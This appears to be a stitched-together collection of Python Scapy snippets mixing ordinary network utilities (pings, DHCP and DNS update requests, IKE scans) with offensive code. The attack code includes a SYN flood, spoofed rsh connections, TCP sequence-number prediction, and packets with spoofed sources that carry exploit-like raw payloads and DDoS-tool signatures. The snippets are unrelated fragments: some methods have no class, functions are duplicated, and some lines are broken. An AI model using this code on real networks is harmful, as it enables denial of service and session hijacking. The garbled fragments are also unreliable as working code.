def exploit_test(src, dst, iface, count):
pkt = IP(src=src, dst=dst) / UDP(dport=518) / \
Raw(load="\x01\x03\x00\x00\x00\x00\x00\x01\x00\x02\x02\xE8")
send(pkt, iface=iface, count=count)
pkt = IP(src=src, dst=dst) / UDP(dport=635) \
/ Raw(load="^\xB0\x02\x89\x06\xFE\xC8\x89F\x04\xB0\x06\x89F")
send(pkt, iface=iface, count=count)
def spoof_conn(src, tgt, ack):
ip_layer = IP(src=src, dst=tgt)
tcp_layer = TCP(sport=513, dport=514)
syn_pkt = ip_layer / tcp_layer
send(syn_pkt)
ip_layer = IP(src=src, dst=tgt)
tcp_layer = TCP(sport=513, dport=514, ack=ack)
ack_pkt = ip_layer / tcp_layer
send(ack_pkt)
def ddos_test(src, dst, iface, count):
pkt = IP(src=src, dst=dst) / ICMP(type=8, id=678) / Raw(load='1234')
send(pkt, iface=iface, count=count)
pkt = IP(src=src, dst=dst) / ICMP(type=0) / Raw(load='AAAAAAAAAA')
send(pkt, iface=iface, count=count)
pkt = IP(src=src, dst=dst) / UDP(dport=31335) / Raw(load='PONG')
send(pkt, iface=iface, count=count)
pkt = IP(src=src, dst=dst) / ICMP(type=8, id=456)
send(pkt, iface=iface, count=count)
def ping_pro(ip):
ping_pkt = IP(dst=ip) / ICMP(type=8, code=0) # 制造一个Ping包
ping_result = sr1(ping_pkt, timeout=2,
verbose=False) # Ping并且把返回结果复制给ping_result
ping_pkt.show()
# ping_result.show() # 查看回显结果
# print(ping_result[ICMP].show())
if ping_result: # ping_result[ICMP].type == ping_result[ICMP].code == 0:
print('%s 通!' % ping_result[IP].src)
else:
print('%s 不通!' % ip)
def dhcp_request(iface=None,**kargs):
if conf.checkIPaddr != 0:
warning("conf.checkIPaddr is not 0, I may not be able to match the answer")
if iface is None:
iface = conf.iface
hw = get_if_raw_hwaddr(iface)
return srp1(Ether(dst="ff:ff:ff:ff:ff:ff")/IP(src="0.0.0.0",dst="255.255.255.255")/UDP(sport=68,dport=67)
/BOOTP(chaddr=hw)/DHCP(options=[("message-type","discover"),"end"]),iface=iface,**kargs)
def qytang_ping(ip):
ping_pkt = IP(dst=ip) / ICMP()
ping_result = sr1(ping_pkt, timeout=2, verbose=False)
if ping_result:
return ip, 1
else:
return ip, 0
def ping(self):
self.pkt = IP(dst=self.ip, src=self.srcip) / ICMP() / (b'v' * self.length)
for i in range(5):
result = sr1(self.pkt, timeout=1, verbose=False)
if result:
print('+', end='', flush=True)
else:
print('?', end='', flush=True)
print()
def ping1(ipadd):
ping_pkt = IP(dst=ipadd) / ICMP()
ping_result = sr1(ping_pkt, timeout=2, verbose=False)
# print(ping_result)
if ping_result:
r = '1'
else:
r = '0'
return r
def make_reply(self, req):
ip = req.getlayer(IP)
dns = req.getlayer(DNS)
resp = IP(dst=ip.src, src=ip.dst) / UDP(dport=ip.sport, sport=ip.dport)
rdata = self.match.get(dns.qd.qname, self.joker)
resp /= DNS(id=dns.id,
qr=1,
qd=dns.qd,
an=DNSRR(rrname=dns.qd.qname, ttl=10, rdata=rdata))
return resp
def ping(self):
self.pkt = IP(dst=self.ip, src=self.srcip) / ICMP() / (b'v' * self.length) #
# 在ping的方法中,如果不加上这句让src获取到新赋的值,在调用这个ping时,src始终用的还是构造方法里的none,不知道为什么会这样?
for i in range(5):
result = sr1(self.pkt, timeout=1, verbose=False)
if result:
print('!', end='', flush=True)
else:
print('.', end='', flush=True)
print()
def check_TTL(ipsrc, ttl):
if IPTEST(ipsrc).iptype() == 'PRIVATE':
return
if ipsrc not in ttl_values:
pkt = sr1(IP(dst=ipsrc) / ICMP(), retry=0, timeout=1, verbose=0)
ttl_values[ipsrc] = pkt.ttl
if abs(int(ttl) - int(ttl_values[ipsrc])) > THRESH:
print(f'\n[!] Detected Possible Spoofed Packet From: {ipsrc}')
print(f'[!] TTL: {ttl}, Actual TTL: {str(ttl_values[ipsrc])}')
def call_TSN(tgt):
seq_num = 0
pre_num = 0
diff_seq = 0
for x in range(1, 5):
if pre_num:
pre_num = seq_num
pkt = IP(dst=tgt) / TCP()
ans = sr1(pkt, verbose=0)
seq_num = ans.getlayer(TCP).seq_num
diff_seq = seq_num - pre_num
print(f'[+] TCP Seq Difference: {str(diff_seq)}')
return seq_num + diff_seq
def make_reply(self, req):
mac = req.src
if type(self.pool) is list:
if not mac in self.leases:
self.leases[mac] = self.pool.pop()
ip = self.leases[mac]
else:
ip = self.pool
repb = req.getlayer(BOOTP).copy()
repb.op="BOOTREPLY"
repb.yiaddr = ip
repb.siaddr = self.gw
repb.ciaddr = self.gw
repb.giaddr = self.gw
del(repb.payload)
rep=Ether(dst=mac)/IP(dst=ip)/UDP(sport=req.dport,dport=req.sport)/repb
return rep
def dyndns_del(nameserver, name, type="ALL", ttl=10):
"""Send a DNS delete message to a nameserver for "name"
dyndns_del(nameserver, name, type="ANY", ttl=10) -> result code (0=ok)
example: dyndns_del("ns1.toto.com", "dyn.toto.com")
RFC2136
"""
zone = name[name.find(".") + 1:]
r = sr1(IP(dst=nameserver) / UDP() / DNS(
opcode=5,
qd=[DNSQR(qname=zone, qtype="SOA")],
ns=[DNSRR(rrname=name, type=type, rclass="ANY", ttl=0, rdata=b"")]),
verbose=0,
timeout=5)
if r and r.haslayer(DNS):
return r.getlayer(DNS).rcode
else:
return -1
def dyndns_add(nameserver, name, rdata, type="A", ttl=10):
"""Send a DNS add message to a nameserver for "name" to have a new "rdata"
dyndns_add(nameserver, name, rdata, type="A", ttl=10) -> result code (0=ok)
example: dyndns_add("ns1.toto.com", "dyn.toto.com", "127.0.0.1")
RFC2136
"""
zone = name[name.find(".") + 1:]
r = sr1(IP(dst=nameserver) / UDP() /
DNS(opcode=5,
qd=[DNSQR(qname=zone, qtype="SOA")],
ns=[DNSRR(rrname=name, type="A", ttl=ttl, rdata=rdata)]),
verbose=0,
timeout=5)
if r and r.haslayer(DNS):
return r.getlayer(DNS).rcode
else:
return -1
def queso_sig(target, dport=80, timeout=3):
p = queso_kdb.get_base()
ret = []
for flags in ["S", "SA", "F", "FA", "SF", "P", "SEC"]:
ans, unans = sr(IP(dst=target)/TCP(dport=dport,flags=flags,seq=RandInt()),
timeout=timeout, verbose=0)
if len(ans) == 0:
rs = "- - - -"
else:
s,r = ans[0]
rs = "%i" % (r.seq != 0)
if not r.ack:
r += " 0"
elif r.ack-s.seq > 666:
rs += " R" % 0
else:
rs += " +%i" % (r.ack-s.seq)
rs += " %X" % r.window
rs += " %x" % r.payload.flags
ret.append(rs)
return ret
def dup_IL(pkt):
i_pkt = pkt.getlayer(IP)
version = i_pkt.version
tos = i_pkt.tos
_id = i_pkt.id
flags = i_pkt.flags
ttl = i_pkt.ttl
proto = i_pkt.proto
src = i_pkt.src
dst = i_pkt.dst
options = i_pkt.options
n_pkt = IP(version=version,
id=_id,
tos=tos,
flags=flags,
ttl=ttl,
proto=proto,
src=src,
dst=dst,
options=options)
return n_pkt
def ikev2scan(ip):
return sr(
IP(dst=ip) / UDP() / IKEv2(init_SPI=RandString(8), exch_type=34) /
IKEv2_payload_SA(prop=IKEv2_payload_Proposal()))
#
import logging
logging.getLogger("kamene.runtime").setLevel(logging.ERROR) # 关闭不必要的报错
from kamene.all import *
from kamene.layers.inet import IP, ICMP
ping_pkt = IP(dst='192.168.157.129') / ICMP() # 制造一个Ping包
ping_result = sr1(ping_pkt, timeout=2,
verbose=False) # Ping并且把返回结果复制给ping_result
ping_result.show()
#
#
# from http.server import HTTPServer, CGIHTTPRequestHandler
# port = 80
# httpd = HTTPServer(('',port), CGIHTTPRequestHandler)
# print('Starting simple httpd on port: ' + str(httpd.server_port))
# httpd.serve_forever()
import paramiko
ssh = paramiko.SSHClient()
ssh.load_system_host_keys()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect('192.168.157.129',
port=22,
username='******',
password='******',
timeout=5,
compress=True)
stdin, stdout, stderr = ssh.exec_command('ls')
x = stdout.read().decode()
print(x)
def syn_flood(src, tgt):
for sport in range(1024, 65535):
ip_layer = IP(src=src, dst=tgt)
tcp_layer = TCP(sport=sport, dport=513)
pkt = ip_layer / tcp_layer
send(pkt)
def __init__(self, ip):
self.ip = ip
self.srcip = None
self.size = 100
self.pkt = IP(dst=self.ip, src=self.srcip) / ICMP() / (b'v' * self.size)
def size(self, size):
self.size = size
self.pkt = IP(dst=self.ip, src=self.srcip) / ICMP() / (b'v' * self.size)
def src(self, srcip):
self.srcip = srcip
self.pkt = IP(dst=self.ip, src=self.srcip) / ICMP() / (b'v' * self.size)
def ikescan(ip):
return sr(
IP(dst=ip) / UDP() / ISAKMP(init_cookie=RandString(8), exch_type=2) /
ISAKMP_payload_SA(prop=ISAKMP_payload_Proposal()))
def scan_test(src, dst, iface, count):
pkt = IP(src=src, dst=dst) / UDP(dport=7) / Raw(load='cybercop')
send(pkt)
pkt = IP(src=src, dst=dst) / UDP(dport=10000) / Raw(load='Amanda')
send(pkt, iface=iface, count=count)